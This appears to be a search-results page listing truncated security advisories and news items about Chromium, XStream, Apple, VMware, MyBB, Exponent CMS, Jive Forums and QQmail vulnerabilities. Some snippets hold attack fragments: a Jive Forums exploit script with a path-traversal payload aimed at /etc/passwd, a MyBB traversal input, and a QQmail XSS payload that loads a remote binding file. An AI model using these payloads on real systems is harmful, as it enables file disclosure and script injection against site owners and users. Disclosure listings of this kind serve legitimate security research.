14 matches found
chromium -- multiple security fixes
Chrome Releases reports: This update includes 4 security fixes: 324596281 High CVE-2024-1938: Type Confusion in V8. Reported by 5f46f4ee2e17957ba7b39897fb376be8 on 2024-02-11 323694592 High CVE-2024-1939: Type Confusion in V8. Reported by Bohan Liu @P4nda20371774 of Tencent Security Xuanwu Lab on...
XStream is vulnerable to a Remote Command Execution attack
Impact The vulnerability may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required...
XStream is vulnerable to a Remote Command Execution attack
Impact The vulnerability may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required...
About the security content of iCloud for Windows 7.9 - Apple Support
About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page. For more information about security, se...
About the security content of Safari 11.0.1 - Apple Support
About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page. For more information about security, se...
MyBB Directory Traversal
Description: ============ product:MyBB Homepage:https://mybb.com/ vulnerable version:input'pathfolder'; Line 327 $dir = @opendirMYBBROOT.$path; if we input "pathfolder" to "../../bypass/smile",Directory Traversal success! ============ Fixed: ============ This vulnerability was fixed in version...
VMSA-2017-0006 : VMware ESXi, Workstation and Fusion updates address critical and moderate security issues
a. ESXi, Workstation, Fusion SVGA memory corruption ESXi, Workstation, Fusion have a heap buffer overflow and uninitialized stack memory usage in SVGA. These issues may allow a guest to execute code on the host. VMware would like to thank ZDI and Team 360 Security from Qihoo for reporting these...
Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan
Chinese hackers have taken the smishing attack to the next level, using rogue cell phone towers to distribute Android banking malware via spoofed SMS messages. SMiShing — phishing attacks sent via SMS — is a type of attack wherein fraudsters use a number spoofing attack to send convincing bogus message...
Exponent CMS 2.4.0 Blind SQL Injection
Document Title: =============== Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 References Source: ==================== https://exponentcms.lighthouseapp.com/projects/61783/tickets/1394-blind-sql-injection-vulnerability-in-exponent-cms-240-4...
Pwn2Own Day Two: Safari, Microsoft Edge Go Down Winner Announced
In the end, it was a nail-biter pitting Tencent Security Team Sniper KeenLab and PC Manager against JungHoon Lee lokihardt for the title of Master of Pwn for Pwn2Own 2016. After a tense last two minutes of the competition, it was Tencent Security Team Sniper and its successful code execution of a...
Jive Forums 5.5.25 Directory Traversal
JiveForums " print " Usage: %s http://localhost /jiveforums/" % sys.argv0 sys.exit payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' print "+ Trying to request :"+sys.argv1+sys.argv2+paylo...
Jive Forums 5.5.25 - Directory Traversal
Exploit for jsp platform in category web applications ''' JiveForums " print " Usage: %s http://localhost /jiveforums/" % sys.argv0 sys.exit payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' print "+ Trying...
APPLE-SA-2014-02-25-3 QuickTime 7.7.5
APPLE-SA-2014-02-25-3 QuickTime 7.7.5 QuickTime 7.7.5 is now available and addresses the following: QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Playing a maliciously crafted movie file may lead to an unexpected application...
QQmail Multiple Xss Vulnerabilities-vulnerability warning-the black bar safety net
QQmail Multiple Xss Vulnerabilities Author: www.80vul.com 1. firefox2 css xss vulnerabilities styleBODY-moz-binding:url"http://www.80vul.coom/test.xmlxss"/style test.xml: ? xml version="1.0"?& gt; bindings xmlns="" binding id="xss" implementation constructor! CDATAalert'XSS'/constructor...